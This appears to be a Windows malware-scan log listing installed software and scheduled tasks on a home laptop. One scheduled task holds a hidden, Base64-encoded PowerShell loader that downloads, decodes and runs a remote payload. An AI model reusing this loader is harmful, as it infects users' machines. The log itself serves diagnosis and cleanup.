HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{1504CF6F-8139-497F-86FC-46174B67CF7F}) (Version: 2.20.51 - Hewlett-Packard Company)
HP Documentation (HKLM\...\HP_Documentation) (Version:  - HP)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8293.5264 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{61EB474B-67A6-47F4-B1B7-386851BAB3D0}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{D7D5F438-26EF-45AB-AB89-C476FBCF8584}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{8B4EE87E-6D40-4C91-B5E8-0DC77DC412F1}) (Version: 1.4.1 - Hewlett-Packard Company)
HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{EFA01423-3857-468C-B7B6-F30AA08E50BC}) (Version: 1.1.5.1 - Hewlett-Packard)
IGT Slots: Paradise Garden (x32 Version: 3.0.2.59 - WildTangent) Hidden
Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1018 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10600.147 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1158 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4240 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Living Legends: Frozen Beauty Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Lost Lands: Dark Overlord Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.6366.2062 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mystery Expedition: Prisoners of Ice (x32 Version: 3.0.2.59 - WildTangent) Hidden
Office 16 Click-to-Run Extensibility Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Opera Stable 35.0.2066.37 (HKLM-x32\...\Opera 35.0.2066.37) (Version: 35.0.2066.37 - Opera Software)
PDF Converter Elite 4.0 (HKLM\...\{51807840-3627-4016-B579-A32D54097837}_is1) (Version: 4.0 - PDFConverter.com)
Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.370.99 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7564 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.0.0.59 - REALTEK Semiconductor Corp.)
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
Search Know (HKLM-x32\...\Search Know) (Version: 2.0.5858.6924 - Search Know) <==== ATTENTION
Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Star Wars Empire at War Forces of Corruption (HKLM-x32\...\{6592FDEC-2C1A-413A-9985-25FEC2F0848D}) (Version: 1.0 - LucasArts)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.97 - Synaptics Incorporated)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App for HP (x32 Version: 4.0.11.16 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2478984944-2039465796-333368353-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Jonathan\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {09236F08-ACC7-4C25-8F6A-9283C87BEFA2} - System32\Tasks\HPCeeScheduleForJonathan => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {1F192880-6B02-411A-B8E0-3BFF632E5DB3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-31] (Google Inc.)
Task: {278E2F9A-20B5-4035-AA0B-573FC3C3DB7C} - System32\Tasks\UpdaterEX => C:\Users\Jonathan\AppData\Roaming\UpdaterEX\UpdateProc\UpdateTask.exe [2013-04-12] () <==== ATTENTION
Task: {3DD3C169-FF2E-4083-BC62-9EFDBA87CCAB} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2016-01-19] (Microsoft Corporation)
Task: {3ED847F7-E9A3-4B3E-B370-7599C6E99510} - System32\Tasks\Opera scheduled Autoupdate 1446314695 => C:\Program Files (x86)\Opera\launcher.exe [2016-02-01] (Opera Software)
Task: {488D492D-D5C8-4F83-9FF0-FB98632CFBC9} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-19] (Microsoft Corporation)
Task: {4AD36820-EBAF-40DE-997D-697CADBC567F} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)
Task: {4C411F4E-EC13-4C36-AF83-654DEBB5A394} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)
Task: {4E474ABA-D6C6-44FB-842D-80D8601DA9C7} - System32\Tasks\avast! SL Update => C:\Program Files\AVAST Software\SecureLine\SLUpdate.exe [2016-01-01] (AVAST Software)
Task: {5BB340FA-98D2-4DA0-94D1-6CD0DEC5E954} - System32\Tasks\{7E0B0E47-0F79-0808-0B11-0C0C0A7F110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAdQBuAGwAbwBuAGcAbwAuAGkAbgBmAG8ALwB1AC8APwBhAD0AZQBzAHoASABHAHEAUwBjAEUAeQBxAG0AeAB4AGQANQBvAFMAUABkADQAdABSAFYAQwAxAHAATABaAGQAQwBIAF8AZABqAGoAbgBKADUAagA4AHQATgBZAEkAaQBrAEcAeABaAEEAagBtAHIAbABPAEYAWQBpAFAAYwBaAEYAbgBQADAAXwA0ADcAWgA1AEsATgBNADcAcQBiAHcASQB0AHkATQA1AG4AZgB1AHIANgBFAFQAcwBzAHoANwBEAHMAcgBGAHUARABiAFUAYQBQAHgAMQBRAG0ASgBYAEcATwBNAHoATQBFAGIAMQBiAFEAbQBZADgAaAB6AEMAOQB0ADUASwBfAE8AYQBPAEQAZABjAEsAXwBMAEIAYQBSAGIAdgAyAG8AQQBGADQAdQA1AHcAdgB5AHgAZwA0ADAARwB1AEsAdgAtAHEAOQA1AEoALQBlAGcAYQBOAGUAeABVAGUAWgBWAHEANQBhAFgAZQBuAGoAZQByAGUAMwB1AGkAZABiAF8AMQA5ADcAYwBUAEwAOQBvAHQAbQBJAEwAbABKAF8AVQBlAHIAUABDAEYATwBSADYATgBwAHgATwBUADgAaABFADcARgByAHUAZQBLAGkARwBrAGEAWQBHAHAATwBYAGUAQQBNADEAaABfAG8AYgBJAFQATgBGADgAbABVAEIANgBpAE0AWgBLAF8AVgBXAG0AMQBkAE8AWgBmAEEAbABBAE4AMABzAEIAVwB2AHAAQgBjADkAbAAxAHIAUgBPAHAAdwA5AFQAbAByAEkAawBzAHUAbwBmAHYAUQBMAGoAUABhAGQAOAB0AHcAVwBDAC0AcABIAHYARgBVAGIARwA2AGQASQB5AEUAZABDAFkAOABvAE4AYwBJAEoAdAAzAEEARQBzAGsAbgA1ADQAaAB6AEIARgBfAHgAMQBUAEkASABSAC0AZQBsAG8AaABLAGIAYwBCAE4AbQBDAEkAaQBIAGoAcgBlAGwAbQA3AEcAZABqAGUANQBhAHcANABpAFMAdABVAHQAQwBmAGUAawA2AHgAbgBDAG0AdABXAF8AMABPAC0AQwB2AF8AXwBmAGkAUwA3AFcAVwBoAEkATwAyAGQASAA0AGIAVAA0ADAAUABMADQAaQB4AFEAagBOAHIANQAzADYAMQA3ADgAeAAxADYASwBuADQATABZAEUAZABxAFUAMwB0AC0ARwBoADAAWgBfAHIAYwAwAGwAXwBoAEcAaQBMAFMAcABSADEAdABwAGcAOQA2ADQAZgBwAEcAQgBhAEoATgBvADQANwBWAEwAOQBqAGwAXwB3AGgAbQBQAHIAUQA4AFMAbAB3AGIARQBGAC0AaQBoAGsAWgBWAHgATABBAE8AOABOAE0AWgA1AEoARQAtAFcAdABrAGgAVABDADkAbwBzAE0AUwBDAEkAbQBPAGwATgBIAG4AdQB3AEoAMwBzAFoAeQAzADQAMAA5AFgASAAwAFMAawAwAHUAZQBaAE8AYQBGAFkAQgA1AEUAMABoADMAagBtAG0AcwAzAEIAMQBfAHQAZAB5AFAAcwBGADkALQBtADcAdwBmAFUAVQBNAEIAOQBOAFcASgBMAG0AbgBIAHYAZABmADgAUABKAEMAdQBuADcAVwBIAC0ASwAyADAARAB2ADIAdwBlAEUAWABVAHMATAA1AEcAegBWAGwASgBmAFUAbgBmAGMASAB3AEwAVwByAEkAdAA3AEcANABjAG0ATgAzAGUASwBPAC0AQwB6AG8AYwBtAGsAcgBlAE4ANABqAG4ATQB0ADQAQgBWAEQAYwAyAGkAbABNAGsAUwB5ADgAZQBTAGgAQQB4AEgAYwB1AGIAXwBaADMAVABYAG0AWgBFADgAaQBzAHgAeQBoADkAMABmAGYASAB6AHAATgB5AHkANAB6AFkAcgAwADIAeQBUADIAQgBWADQAMwB4AFIATgBYAG4ASwBEAEoASwAwAGwASgBZAEcAaAAyAHMAUwB6AEEANABzAHgANABQAGoALQBZADgANABvADUASQBHAHUATgBQAEsAYgBGAHAAMwBmADcAaABIAHMAcwBhADEAbABMAGsAeQBfAF8ARgBlAGYAeABIAGkANQBaADMASgA5AG4AbABfAHgANwB4AHAATAA0AGcAUQBHAGQAawBXAGgANABxADYAdQBzADkAdwBXADEAUQA3AE0AWgBBAC0AbQBNAG8AVwBYAGoAdABEAEsAYgBHAFoAeABjADAAZwB1AHUAbwAzAFEAdABQAEsAegB4AG0AagBlAG0AOQB6ADYAMgBsAGwAZQBZADcANwBUAFgANwA5AFUAYwAwAEMAWQBwAF8ARgAmAGMAPQBvAEoAeABSAEYAUABOAFAALQB6AEkARQBxAHMAQQBPAFcARQBaADAAOABnAE8AZgBuADMAZABhAGsAZQA1AG8AcABZAGgAcwBYAEkAYgBfAEcAQgBSADEASQA4AHEAawB3AEIAcwBZAGQAYwBEAGUARwBUAHAAZwBDAFoAbQBDAHQAawBPADYARQBfAHQAbgA4AHcASgBoAEgAMAAwAFQAVgB3AEwATgBCADUAegBxAE0AVQBYADEAUwB0AGIAWABCAGQAbQBaADMAQgBtAGwASwBKAFAAdwBkAGIANgA5AHYAdgBoAC0AdwA1AFEAbQBjAFQAdABFAGUARAA3AHAAVABVAGUASQA0AGsAMQA0AGkAcwBYAGEANwBEAEIAOAA5AEUAUwB5AEIANQBUAHIARgA5AFoAOABRAG8AbQBtADYASABCAHMAawBlAGEAQwBoADIAMQBRAEsAQgBBADIAVwA0AGQAZgB2ADkAaQBYADYAZAB0ADIAVgBRADEAWgBOADEAUgBOAGYAaQB6AE4AagBYAFMAaABUAFgAUwB6ADAAWQBpAE4ANwBFAFkAcwAxAEYARAAwAEoALQBuAFUAdQA1AHYAQgBYAHEANQBzAHIARABEADUALQAwAFcAWABXAHEAVAAtAEwAMgB2AGIAVQBEAGMATgBMAFMAOAA1AEEAcAB4AEwAbABlADEARQBYAHEATQBmAEYAUgBIAC0AawBMAHcAWQBXAGsAZQB0AFUARQA5AGsAQQBMAEoAcQBNAEIAOQBEAEkATQB0AHYAWQB5AGcAWQBPAFkAcwByAGUAMQBCAHcATwB1AHcAcgBTAGcAbgBrADIAbQBaAF8AZgAtAFQAeQBJAFYASgBFAGsAXwBzAF8ATAA1AGUAMABRAF8AMwBjAGcAQQBEAGkATwBKAEgAUQBLAFQATwBPAHgATAB4AGEAegBFAHMATgBpAFQAQgBxAFoASgB3AHMAcQBQAGgAdwA1AFUAQQB2AGcAXwB1ADIAOABaAG0AawBFAEkATwBwAEEAdQBSAHIAVgB3ADcAMQB3ADgASABiAHIAVwBlADkAMgByADMAeABnAEIASAAzAHUAVgAzAFUASQBvAG4AagBZAGsAYQA0AHEAQwB0AFcALQB2AFQAeABrAHIAXwBuAHIAaQBNAGcATABHAGMAZwBKAGsANQB2AGQALQAtAGsASwBtAHYAaAA0AF8AcABFAGcATQAtAGgAOABnADIAYgBQADUANAAwAHgATQBMAHMAdQA2AGUAVQBGADYAYQAyAEEAVQBQAGcAQgBmAGYAaABHAGoAMwB1AEQARABSAHEAMwBvAFQAbQBBAFcAYQBGAFgAagBwADMASgBqAFkALQA0ADIAUwBLAEkAMQBIAHUAVwBBAHcAZgB5AEYAdABJAG0AeABtADMARQBqAFQASgA0AFIAeABLAHIATQBRADUAegB6AGoAaQB4AC0ANgAtAFcANgBoAEUAVQBxAFMAMgA3ADgAZQBvAEQATABxAEQAWgBNAEYAUQBjAGgAYQBPAHkAdgBlAEcAcwBBADMAVwBVAEoAYgBaAGIARwBqAHIAdAB4AEwAZABhAFkAYQA1AF8AZgBrAEwAUQA5AHMASgA5AGkANABPAFIAMwA2AHEAVABFAEoAbQBvAFMAbABVADEAYQBHAEsATwBkAGEAVABUAEEAQQBMAFkAeQA0AEMASgA4AFEASgB1AE4AVQBOAFIASgBEAE0AcABQAHQAOABVADIAeQBMAEcARgB6AGQAXwBOAHMASQBqADEAbABNAEsAagBzAG0AagBKAG0AUAA1AEYAUQBWAFgATQBnAEsAUgAtAHUARABLAE4AZwAyAE0AbQBJAGIAeAA1AFUAZQBSAGQAMQA0AHYAdABOAEYANgByAFUAdABlAEwAUgBKAEkAeAA0AGcASABSAHMANQAtAEcAZgBxAFMAMwBUAFoAUQBBAEcAZgB5AEYAOAAzADQASgA1AGkAdwA0AG0AYgB4AEgASABmADgAMQB6ADYAUgBOAHkAWQBsAE8AbwBLAFcAdgBlAFcALQBfAF8ASwB5AGUATgBzADYAVwBKAFUARwBMAFUARQBXADQAbgBnAGQAeABXAFgAZwA4ADMAdgBHAHoAVQB1AEkALQBOADgAbgB5AFcANQA2AFYAOAB0AEcAawBkADUASwBZAFkAZQBZAEEAaABIAGUAUgAzAEwAbQAtAHEAYQBpADgAdwBMAGgAeABlAHAAVABiAEcAawBBADUAagB3ADcAOQBuAEkANAByAG4AcgA2AHkAVABrAHEAZAA4AFUAVQBsAGwANQBKAHIAeQBUAHMATQA1AFIAUABtAHMAeABXAF8ANQBVAHQAaQBHAG4ATwB5AFkAVgBHAHoAeQB2AEkAMwB1AEIARwBQAGIASQAxAGQAQQBiAHgAbgBnAHoAQwBRAFgAMgBoAGwAagBlAHEAbwB6AEkAUQBRADcAZgAyAHUAXwBQAGkAdABEADQAaQA5AEMAegBiAE8AJgByAD0AMwAzADEAMQA3ADAANQAyADMAOAA3ADAAOQA2ADUANwA3ADcAMgAiADsAJABzAHQAcwBrAD0AIgB7ADcARQAwAEIAMABFADQANwAtADAARgA3ADkALQAwADgAMAA4AC0AMABCADEAMQAtADAAQwAwAEMAMABBADcARgAxADEAMABDAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBTAEoATABLAEwATQBNAEoAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {5F6CAC0E-18E9-44C0-B0A7-6B7B5283B053} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {67A7A9A4-67A3-4723-BE20-8A0DC52591FC} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {7837661A-F267-4C88-835D-0FEAB2AFE198} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)
Task: {8163794B-8126-417A-A536-A2D2B46D957A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-01-06] (Hewlett-Packard)
Task: {89EB0970-3EEF-41E1-83D7-B74CA1FC5F84} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-31] (Google Inc.)
